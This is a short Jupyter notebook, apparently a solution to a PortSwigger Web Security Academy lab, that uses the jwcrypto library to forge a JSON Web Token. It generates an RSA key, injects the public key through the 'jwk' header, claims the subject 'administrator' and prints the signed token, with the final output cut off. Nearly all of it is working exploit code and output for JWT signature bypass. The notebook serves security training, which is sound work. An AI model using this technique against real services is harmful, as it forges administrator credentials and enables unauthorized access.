## Inject self-signed JWT via jwk header parameter.
Seems like the least amount of work to implement this attack from building blocks in jwcrypto.

See https://portswigger.net/web-security/jwt.

In [2]:
from jwcrypto import jwt, jwk
import uuid

In [3]:
kid = str(uuid.uuid1())
kid

'31bf81b8-ca5c-11ed-9712-6045bd7ea403'

In [4]:
key = jwk.JWK.generate(kty="RSA", size=2048, kid=kid)

In [11]:
header = {
    "kid": kid,
    "alg": "RS256",
    "jwk": key.export_public(as_dict=True)
}
header

{'kid': '31bf81b8-ca5c-11ed-9712-6045bd7ea403',
 'alg': 'RS256',
 'jwk': {'kty': 'RSA',
  'kid': '31bf81b8-ca5c-11ed-9712-6045bd7ea403',
  'n': '3WUO6sH2_ePoie2_QmY9cTVBTsT0oOINUY3HCV_JVhVoU6GaAX9FnzcrOe4sO1a5i1IYmhlysmIP158jZz2p0TfnEjQCjTIVk3-yvDdDrLd0j9PeMkC_QFyr36KCh3Jc8Z7tO2eo5tuxfUeVogjDzPZJbuNCYJcKlSPFISxU83CcS9HMBs-GfI8mcK3cFB6w-KdUCiAiRbXnea5NyZJssaZegjjmWEqjKIl-2lo3ZEszBkH46z8X0xKuK2N1gbONxZynspUXEjod1cENEqZTdOlJcpaDx3OTi11GiG-smzDWX6PYlezsHX4qCZsYzDPQY-wLabzK1kUdKwKzkXvEnw',
  'e': 'AQAB'}}

In [8]:
claims = {
    "iss": "portswigger",
    "sub": "administrator",
    "exp": 1679676620,
}

In [12]:
token = jwt.JWT(header=header, claims=claims)
token.make_signed_token(key)

In [13]:
token.serialize()

'eyJhbGciOiJSUzI1NiIsImp3ayI6eyJlIjoiQVFBQiIsImtpZCI6IjMxYmY4MWI4LWNhNWMtMTFlZC05NzEyLTYwNDViZDdlYTQwMyIsImt0eSI6IlJTQSIsIm4iOiIzV1VPNnNIMl9lUG9pZTJfUW1ZOWNUVkJUc1Qwb09JTlVZM0hDVl9KVmhWb1U2R2FBWDlGbnpjck9lNHNPMWE1aTFJWW1obHlzbUlQMTU4alp6MnAwVGZuRWpRQ2pUSVZrMy15dkRkRHJMZDBqOVBlTWtDX1FGeXIzNktDaDNKYzhaN3RPMmVvNXR1eGZVZVZvZ2pEelBaSmJ1TkNZSmNLbFNQRklTeFU4M0NjUzlITUJzLUdmSThtY0szY0ZCNnctS2RVQ2lBaVJiWG5lYTVOeVpKc3NhWmVnamptV0VxaktJbC0ybG8zWkVzekJrSDQ2ejhYMHhLdUsyTjFnYk9OeFp5bnNwVVhFam9kMWNFTkVxWlRkT2xKY3BhRHgzT1RpMTFHaUctc216RFdYNlBZbGV6c0hYNHFDWnNZekRQUVktd0xhYnpLMWtVZEt3S3prWHZFbncifSwia2lkIjoiMzFiZjgxYjgtY2E1Yy0xMWVkLTk3MTItNjA0NWJkN2VhNDAzIn0.eyJleHAiOjE2Nzk2NzY2MjAsImlzcyI6InBvcnRzd2lnZ2VyIiwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.KSV-RWP8IHHWYJFHHiuR87_QEzSxDUfNv3jIXLjHgnMHK4pqpL16A7nv-dwqIj-iIZzevyyFz3UcApFlfpWJbQjG7OzDaMOv7PaKa6Y61YaamJwMb94JIiGhN1LcKhhHcCwNH7FlM2bTJcxVE-zrxlINxpMlhBLyd0VfxzyHKLtHYX1_Fe_HfkMosvGh9rGifIBfQtQylrDMh0ilvxDAosz1brNYslcXBQGBVMFwgNaE6QgaHqx984eXNDNWPrli_dHu7eEc9663x1